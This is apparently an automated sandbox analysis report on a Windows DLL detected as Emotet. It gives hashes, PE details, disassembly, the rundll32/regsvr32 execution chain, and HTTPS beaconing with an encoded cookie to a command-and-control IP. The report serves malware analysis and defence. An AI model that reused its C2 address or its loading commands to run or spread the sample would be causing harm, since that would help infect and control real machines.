                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.3593198815979092
                                                                    Encrypted:false
                                                                    SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                    MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                    SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                    SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                    SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                    Malicious:false
                                                                    Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:MPEG-4 LOAS
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.24944658171762518
                                                                    Encrypted:false
                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4h:BJiRdwfu2SRU4h
                                                                    MD5:8AAEAD3A5764ACEE115E577550F0598A
                                                                    SHA1:95DC5C13113E112318E381C621CBEFFBCD59375F
                                                                    SHA-256:6703C60D01E2D70EC341882EF346FD68EE2E7A31A94C69094F1AEF8E69058529
                                                                    SHA-512:3675FFAE9E44B4148C17ED61A701711A496D3A65D0A762ED386700CA3EDC7D84FF2FF7852D948C7152CA84F516CF881865D79018E3F7B179F792AB07877EE834
                                                                    Malicious:false
                                                                    Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x15eee0d4, page size 16384, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):786432
                                                                    Entropy (8bit):0.2506244304664288
                                                                    Encrypted:false
                                                                    SSDEEP:384:AwgwE+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AreSB2nSB2RSjlK/+mLesOj1J2
                                                                    MD5:0E643821CBC46201357DE2E2764807BC
                                                                    SHA1:54E2310338E05A004178315EFE7AA0EC4A5F2724
                                                                    SHA-256:E66B471D6B354C0DC6D03C63098635FACC007CD5D12981DB2F86C59428C955C9
                                                                    SHA-512:77247C14BF56E88E1E08E244E853AAE665304C50B2CB80DB9AEE54FF1A75324C2D23DD8254CB5982F89814D638DACE08C73EB44A2D3BDA7258FC0AEB01A987D1
                                                                    Malicious:false
                                                                    Preview:....... ................e.f.3...w........................)..........z.......z..h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... .....................................................................................................................................................................................................................................................3......z...................5Z......z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:SysEx File -
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07693076787038865
                                                                    Encrypted:false
                                                                    SSDEEP:3:ttllJ7v2afw6cfAYaAtAW//lfhRwll3Vkttlmlnl:vllJr2aY6cTz/tY3
                                                                    MD5:0A7FD227FC2D7666779C78978B525C26
                                                                    SHA1:1620116DBB50AE61AC0172E5931A34559A540A47
                                                                    SHA-256:0F2E9DDA6684EC2CF19DE3FD1B106C848ED50E7413D2FF9E3970C2C1EB4D2935
                                                                    SHA-512:E306B268680AB46531210FF6A5F24CCC6DC5526A5D0AD8977FB0BA732378A641C519CB224BA5C6B860F30ADD5C702D9F6B742D87B1F2486ED6A45D09CA112C07
                                                                    Malicious:false
                                                                    Preview:.pX......................................3...w.......z.......z...............z.......z....f......z=a.................5Z......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.482069712713154
                                                                    TrID:
                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                    File name:2V7zjcga5L.dll
                                                                    File size:545280
                                                                    MD5:b65d38f56203a50c2354abaa5af38aa4
                                                                    SHA1:81fb867e785b6e8505ca59b5de7f46d598a37fc3
                                                                    SHA256:18ad1fa8e0dcb3b64ff7ef042649fdc602668b4a0978f0351c98177162916139
                                                                    SHA512:134a8767bd463ee4481731c313618703ef9d925b8ddb911b6eea59d1b9fae7e912ddc86be65145e67c9bb97c4e9e3de5747c43bca5b9016189b183807e42c45b
                                                                    SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZbHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVz
                                                                    TLSH:CFC4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."

                                                                    File Icon

                                                                    Icon Hash:74f0e4ecccdce0e4

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x1800423a8
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x180000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:2
                                                                    File Version Major:5
                                                                    File Version Minor:2
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:2
                                                                    Import Hash:b268dbaa2e6eb6acd16e04d482356598

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], esi
                                                                    push edi
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec ecx
                                                                    mov edi, eax
                                                                    mov ebx, edx
                                                                    dec eax
                                                                    mov esi, ecx
                                                                    cmp edx, 01h
                                                                    jne 00007F57B0A17F47h
                                                                    call 00007F57B0A1A0D4h
                                                                    dec esp
                                                                    mov eax, edi
                                                                    mov edx, ebx
                                                                    dec eax
                                                                    mov ecx, esi
                                                                    dec eax
                                                                    mov ebx, dword ptr [esp+30h]
                                                                    dec eax
                                                                    mov esi, dword ptr [esp+38h]
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop edi
                                                                    jmp 00007F57B0A17DF0h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ecx
                                                                    dec eax
                                                                    sub esp, 00000088h
                                                                    dec eax
                                                                    lea ecx, dword ptr [00014D05h]
                                                                    call dword ptr [0000FC7Fh]
                                                                    dec esp
                                                                    mov ebx, dword ptr [00014DF0h]
                                                                    dec esp
                                                                    mov dword ptr [esp+58h], ebx
                                                                    inc ebp
                                                                    xor eax, eax
                                                                    dec eax
                                                                    lea edx, dword ptr [esp+60h]
                                                                    dec eax
                                                                    mov ecx, dword ptr [esp+58h]
                                                                    call 00007F57B0A26ACAh
                                                                    dec eax
                                                                    mov dword ptr [esp+50h], eax
                                                                    dec eax
                                                                    cmp dword ptr [esp+50h], 00000000h
                                                                    je 00007F57B0A17F83h
                                                                    dec eax
                                                                    mov dword ptr [esp+38h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [esp+48h]
                                                                    dec eax
                                                                    mov dword ptr [esp+30h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [esp+40h]
                                                                    dec eax
                                                                    mov dword ptr [esp+28h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [00014CB0h]
                                                                    dec eax
                                                                    mov dword ptr [esp+20h], eax
                                                                    dec esp
                                                                    mov ecx, dword ptr [esp+50h]
                                                                    dec esp
                                                                    mov eax, dword ptr [esp+58h]
                                                                    dec eax
                                                                    mov edx, dword ptr [esp+60h]
                                                                    xor ecx, ecx
                                                                    call 00007F57B0A26A78h
                                                                    jmp 00007F57B0A17F64h
                                                                    dec eax
                                                                    mov eax, dword ptr [eax+eax+00000000h]

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 build 21022
                                                                    • [LNK] VS2008 build 21022
                                                                    • [ASM] VS2008 build 21022
                                                                    • [IMP] VS2005 build 50727
                                                                    • [RES] VS2008 build 21022
                                                                    • [EXP] VS2008 build 21022
                                                                    • [C++] VS2008 build 21022

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x520000x3d5f0x3e00False0.355216733871data5.3916243397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                    RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                    ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc

                                                                    Exports

                                                                    NameOrdinalAddress
                                                                    DllRegisterServer10x180042050
                                                                    DllUnregisterServer20x180042080

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 14, 2022 05:02:21.286027908 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:21.286073923 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:21.286159039 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:21.323476076 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:21.323508024 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:21.901115894 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:21.901314020 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:22.493140936 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:22.493186951 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:22.493604898 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:22.493717909 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:22.514161110 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:22.556518078 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:23.362123966 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:23.362224102 CEST4434975423.239.0.12192.168.2.5
                                                                    May 14, 2022 05:02:23.362298012 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:23.362323999 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:23.370688915 CEST49754443192.168.2.523.239.0.12
                                                                    May 14, 2022 05:02:23.370733023 CEST4434975423.239.0.12192.168.2.5

                                                                    HTTP Request Dependency Graph

                                                                    • 23.239.0.12

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.54975423.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-05-14 03:02:22 UTC0OUTGET / HTTP/1.1
                                                                    Cookie: IGSITR=HJk2yqksn3jmOrlkjuqjRrOytL36Pszs0ofIX1jQk/Be1o+ZJK3BH16JgDf6yAW8We2QNZiNZF73x9i8Cr/2lwvuBtCMCqzhtUwH+utXxsaxxeFDiVcXHUnp3RcBPjBK+vqM6Yo3emfENRl9L6E53er+8Ox9ZdSnyBQfUVQqeHCdHLzs9KZ3O1oQ2HgwwRbSVRqsfC5SKTAY5vWLOF/LM1SbrwAwiegfKUsIcWEPMGL5FEJ++dJKJpd/eExNxiNWyzVFKkd3XdxdxGxunr8=
                                                                    Host: 23.239.0.12
                                                                    Connection: Keep-Alive
                                                                    Cache-Control: no-cache
                                                                    2022-05-14 03:02:23 UTC0INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Sat, 14 May 2022 03:02:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    2022-05-14 03:02:23 UTC0INData Raw: 31 65 66 0d 0a ca 95 01 92 be 7c 69 6a 2c 0d fc 2f ba 99 cd b0 85 0f b7 26 fd 83 a8 76 b6 86 4d 6a 51 8f 93 2d f6 e9 12 f0 77 2f 1c a6 7b e1 ac 7b 64 c9 c9 24 34 86 0c 86 66 50 28 dc af 83 57 92 26 68 14 39 0f 8d af 6e 6f 73 ca 0d ff 47 77 9b a5 ab a7 d9 18 c1 23 5f 7a e5 ac 59 ad 1b 9f 58 29 00 3c da d5 d6 8a ba d8 d7 00 e7 cb 6c a6 82 37 28 a6 bb 0a ed 23 9d b2 26 6c 62 17 64 3f a8 3e ca 8d d5 10 cd fc c1 48 bb 6b 9d 49 22 72 40 c0 b4 db c3 f7 dd 44 87 3a 62 b4 b3 50 8b 3c ed 54 65 9d 11 1a 75 de a1 95 a8 7d 7c 47 3b 36 88 3c 21 e2 28 27 f6 ff 2b ba 69 1f 83 9c a4 03 1f 2f a4 28 d8 54 81 ff 7f 8a 20 b8 37 f0 e4 0e 65 ed 63 fb 2e 1f 49 e0 2f 22 9e 17 2b 28 7d f0 bb d6 87 62 43 95 5d e2 1d 40 28 aa b8 05 7a fe 39 91 7e d1 17 63 d4 83 40 f3 33 ca ee 4b 8e
                                                                    Data Ascii: 1ef|ij,/&vMjQ-w/{{d$4fP(W&h9nosGw#_zYX)<l7(#&lbd?>HkI"r@D:bP<Teu}|G;6<!('+i/(T 7ec.I/"+(}bC]@(z9~c@3K


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:1
                                                                    Start time:05:01:50
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\2V7zjcga5L.dll"
                                                                    Imagebase:0x7ff66e0c0000
                                                                    File size:140288 bytes
                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:2
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                                                                    Imagebase:0x7ff602050000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:3
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
                                                                    Imagebase:0x7ff750710000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:4
                                                                    Start time:05:01:51
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:5
                                                                    Start time:05:01:52
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:6
                                                                    Start time:05:01:55
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer
                                                                    Imagebase:0x7ff7040a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:7
                                                                    Start time:05:01:55
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"
                                                                    Imagebase:0x7ff750710000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:8
                                                                    Start time:05:02:18
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:10
                                                                    Start time:05:02:28
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Target ID:15
                                                                    Start time:05:03:24
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x3d0000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Target ID:17
                                                                    Start time:05:04:01
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Target ID:18
                                                                    Start time:05:04:20
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Target ID:20
                                                                    Start time:05:04:37
                                                                    Start date:14/05/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.7%
                                                                      Dynamic/Decrypted Code Coverage:1.6%
                                                                      Signature Coverage:15.8%
                                                                      Total number of Nodes:678
                                                                      Total number of Limit Nodes:6
